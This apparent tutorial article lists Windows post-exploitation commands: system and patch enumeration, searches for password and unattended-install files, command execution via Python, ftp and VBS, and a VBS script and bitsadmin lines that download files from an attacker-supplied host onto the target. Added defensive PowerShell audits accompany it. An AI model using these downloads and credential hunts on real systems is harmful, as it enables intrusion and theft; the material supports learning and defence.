Shulou (Shulou.com), SLTechnology News&Howtos > Servers. Report dated 06/01; updated 2025-03-05.
What practical commands are used in Windows intranet penetration? This article analyzes the question and presents the corresponding commands in detail, in the hope of giving readers who face the same problem a simpler and more workable approach.
This is not a penetration-testing guide, only a brief introduction to several practical commands for Windows intranet privilege escalation, for beginners like us to learn from and observe; we also hope that more experienced readers will forgive any mistakes and offer corrections.
1. Get operating system information
Identify the operating system name and version:
C:\Users\thel3l>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.14393 N/A Build 14393
On a Chinese-language system the output labels are localized, so the search strings must match the localized labels (OS 名称 and OS 版本):
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
Identify the system architecture:
C:\Users\thel3l>echo %PROCESSOR_ARCHITECTURE%
AMD64
View all environment variables:
C:\Users\thel3l>SET
USERNAME=thel3l
USERPROFILE=C:\Users\thel3l
*snip*
View information about a specific user:
C:\Users\thel3l>net user thel3l
User name thel3l
*snip*
The command completed successfully.
2. Get network information
View the routing table:
C:\Users\thel3l>route print
View the ARP cache:
C:\Users\thel3l>arp -a
View listening ports and active connections with their owning process IDs, then the firewall configuration and state:
C:\Users\thel3l>netstat -ano
C:\Users\thel3l>netsh firewall show config
C:\Users\thel3l>netsh firewall show state
(The netsh firewall context has been deprecated since Windows 7 / Server 2008 R2; on current systems use netsh advfirewall show allprofiles for the same information.)
3. Application and service information
View scheduled tasks:
C:\Users\thel3l>schtasks /QUERY /fo LIST /v
On a Chinese-language system, first switch the console code page from GBK (936) to the US code page 437:
chcp 437
and then:
schtasks /QUERY /fo LIST /v
View services together with their process IDs:
C:\Users\thel3l>tasklist /SVC
View installed drivers:
C:\Users\thel3l>DRIVERQUERY
View installed programs and their versions (clues for known vulnerabilities):
C:\Users\thel3l>wmic product list brief
View service, process and startup-item information:
C:\Users\thel3l>wmic service list brief
C:\Users\thel3l>wmic process list brief
C:\Users\thel3l>wmic startup list brief
Check whether .msi packages are installed with elevated privileges (the policy is only effective when AlwaysInstallElevated is 1 in both hives):
C:\Users\thel3l>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\Users\thel3l>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Check whether setuid and setgid bits are set (Services for NFS parameter):
C:\Users\thel3l>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits
View installed patches and their installation dates:
C:\Users\thel3l>wmic qfe get Caption,Description,HotFixID,InstalledOn
Check for the patch of a specific vulnerability (replace KBxxxxxxx with the KB number in question):
C:\Users\thel3l>wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"
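As an added example that is not part of the original post, the following PowerShell audits two of the items above from a hardening standpoint: it reports whether AlwaysInstallElevated is actually effective (the value must be 1 in both HKLM and HKCU) and whether a baseline list of hotfixes is installed. The KB list is a placeholder to be filled in with your own patch baseline, and PowerShell 5.1 or later on the audited host is assumed.

```powershell
# Added example, not from the original post. Assumes PowerShell 5.1+ on the host.

function Test-AlwaysInstallElevated {
    # The policy only makes MSI installs run with elevated rights when BOTH the
    # machine and the user value are 1; checking a single hive is misleading.
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $values = foreach ($p in $paths) {
        $item = Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $v = $null                                   # $null = value (or key) absent
        if ($null -ne $item) { $v = [int]$item.AlwaysInstallElevated }
        [pscustomobject]@{ Hive = $p.Split(':')[0]; Value = $v }
    }
    $enabled = @($values | Where-Object { $_.Value -eq 1 }).Count -eq 2
    $remedy = 'OK'
    if ($enabled) {
        $remedy = 'Set AlwaysInstallElevated to 0 in both hives (GPO: Windows Components > Windows Installer > Always install with elevated privileges = Disabled)'
    }
    [pscustomobject]@{
        Check   = 'AlwaysInstallElevated'
        Enabled = $enabled
        Detail  = ($values | ForEach-Object { "$($_.Hive)=$($_.Value)" }) -join ', '
        Remedy  = $remedy
    }
}

function Test-RequiredHotfixes {
    param(
        # Placeholder: replace with the KB numbers your patch baseline requires.
        [string[]] $RequiredKB = @('KBxxxxxxx')
    )
    # Get-HotFix is the PowerShell equivalent of 'wmic qfe get HotFixID,InstalledOn'.
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $RequiredKB) {
        [pscustomobject]@{
            Check   = "Hotfix $kb"
            Present = $installed -contains $kb
        }
    }
}

Test-AlwaysInstallElevated | Format-List
Test-RequiredHotfixes | Format-Table -AutoSize
```

Run it from the account being audited, since the HKCU half of the check is per user; a result of Enabled = True with a non-OK Remedy is the finding to fix.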
4. Sensitive data and directories
Search for password files or other sensitive files:
C:\Users\thel3l>cd \
C:\>dir /b /s password.txt
C:\>dir /b /s config.*
C:\>findstr /si password *.xml *.ini *.txt
C:\>findstr /si login *.xml *.ini *.txt
Unattended installation files:
These files often contain passwords encoded in base64. They can be found on some large enterprise networks or on systems deployed from Ghost (GHO) images, usually at the following locations:
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
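As an added example that is not part of the original post, the following PowerShell checks the unattended-installation locations listed above from the defender's side: for each file that exists it reports the last write time and how many credential elements it contains, without decoding or printing any value. It assumes PowerShell 5.1 or later, and adds C:\Windows\Panther\Unattend.xml (the standard file name under Panther) to the paths given on the page.

```powershell
# Added example, not from the original post. Assumes PowerShell 5.1+.

function Find-UnattendCredentials {
    $candidates = @(
        'C:\sysprep.inf',
        'C:\sysprep\sysprep.xml',
        'C:\Windows\Panther\Unattend\Unattended.xml',
        'C:\Windows\Panther\Unattended.xml',
        'C:\Windows\Panther\Unattend.xml'      # added here: the standard Panther file name
    )
    foreach ($path in $candidates) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $item = Get-Item -LiteralPath $path
        $hits = 0
        if ($item.Extension -ieq '.xml') {
            try {
                [xml]$doc = Get-Content -LiteralPath $path -Raw
                # Unattend XML stores credentials as <Password><Value>...</Value></Password>
                # (base64 unless <PlainText>true</PlainText>); count them, never print them.
                $hits = @($doc.SelectNodes('//*[local-name()="Password"]/*[local-name()="Value"]')).Count
            } catch {
                $hits = -1                      # malformed XML: still worth a manual look
            }
        } else {
            # sysprep.inf is INI-style; the credential lives on an AdminPassword= line
            $hits = @(Select-String -LiteralPath $path -Pattern '^\s*AdminPassword\s*=').Count
        }
        $action = 'Review and delete if no longer needed'
        if ($hits -ne 0) { $action = 'Remove or sanitize the file; rotate the account password' }
        [pscustomobject]@{
            Path            = $path
            LastWrite       = $item.LastWriteTime
            CredentialNodes = $hits
            Action          = $action
        }
    }
}

Find-UnattendCredentials | Format-Table -AutoSize
```

An empty result means none of the listed files exist; any row with CredentialNodes other than 0 is a leftover deployment artifact that should be cleaned up and whose password should be considered exposed.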
5. File system
You can run commands (for example to check which directories or files are accessible) from any scripting language pre-installed on the system, such as Python:
import os; os.system("cmd /c {command here}")
Use the copy con command to create a batch file that opens an ftp session; inside the ftp prompt, a line beginning with ! runs a local command:
Example
C:\Users\thel3l>copy con ftp.bat
(type the content line by line, press Enter after each line, then press Ctrl+Z followed by Enter to finish the file)
ftp> !{command}
(e.g. !dir or !ipconfig)
Use the copy con command to create a VBS script file:
C:\Users\thel3l>copy con commandExec.vbs
Call WScript.CreateObject("WScript.Shell").Run("cmd /K {command}", 8, True)
(press Ctrl+Z followed by Enter to save the file)
C:\Users\thel3l>commandExec.vbs
List files that are not read-only and not directories (a rough check for writable locations):
C:\Users\thel3l>dir /a-r-d /s /b
6. A useful file transfer script (downloads a file onto the target)
' downloadfile.vbs
' Set your settings
strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation = "c:\{FILE_NAME.EXT}"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
The script was published by the community; run it as follows:
C:\Users\thel3l>cscript.exe downloadfile.vbs
Bitsadmin command:
If the target system is Windows 7 or later, you can use bitsadmin, a command-line tool for creating BITS download and upload jobs:
Example
C:\Users\thel3l>bitsadmin /transfer job_name /download /priority priority URL local\path\file
C:\Users\thel3l>bitsadmin /transfer mydownloadjob /download /priority normal http://{YOUR_IP}/{FILE_NAME.EXT} C:\Users\username\Downloads\{FILE_NAME.EXT}
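From the defender's side, as an added example that is not part of the original post: BITS jobs created with bitsadmin persist in the service's queue and are visible to an administrator, which makes them a useful detection point for the download technique just described. The PowerShell below lists every user's jobs and flags downloads whose source host is not on an allow-list; the allow-list entries are constructed placeholders, and -AllUsers requires an elevated prompt.

```powershell
# Added example, not from the original post. Run elevated; allow-list is a placeholder.

function Get-SuspiciousBitsJobs {
    param(
        # Constructed placeholder: hosts your environment legitimately downloads from.
        [string[]] $AllowedHosts = @('download.windowsupdate.com', 'updates.example.internal')
    )
    Import-Module BitsTransfer -ErrorAction Stop
    foreach ($job in Get-BitsTransfer -AllUsers) {
        foreach ($file in $job.FileList) {
            $remoteHost = ''
            try { $remoteHost = ([uri]$file.RemoteName).Host } catch { }
            $allowed = $AllowedHosts -contains $remoteHost
            [pscustomobject]@{
                JobId      = $job.JobId
                Owner      = $job.OwnerAccount
                Type       = $job.TransferType
                State      = $job.JobState
                RemoteName = $file.RemoteName
                LocalName  = $file.LocalName
                # A download from an unknown host into a user-writable path is the
                # pattern a bitsadmin /transfer staging step leaves behind.
                Suspicious = (-not $allowed) -and ($job.TransferType -eq 'Download')
            }
        }
    }
}

# Triage view: only the flagged rows. Cancelling a job is left to the analyst,
# e.g. Get-BitsTransfer -AllUsers | Where-Object JobId -eq <id> | Remove-BitsTransfer
Get-SuspiciousBitsJobs | Where-Object Suspicious | Format-Table -AutoSize
```

The same allow-list logic can be applied centrally to the Microsoft-Windows-Bits-Client/Operational event log, which records job creation and completion, so that jobs that were already cleaned up from the queue are still caught.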
For example:
bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip
That concludes the practical commands for Windows intranet penetration. I hope the above content is of some help to you. If you still have questions, you can follow the industry information channel for more related knowledge.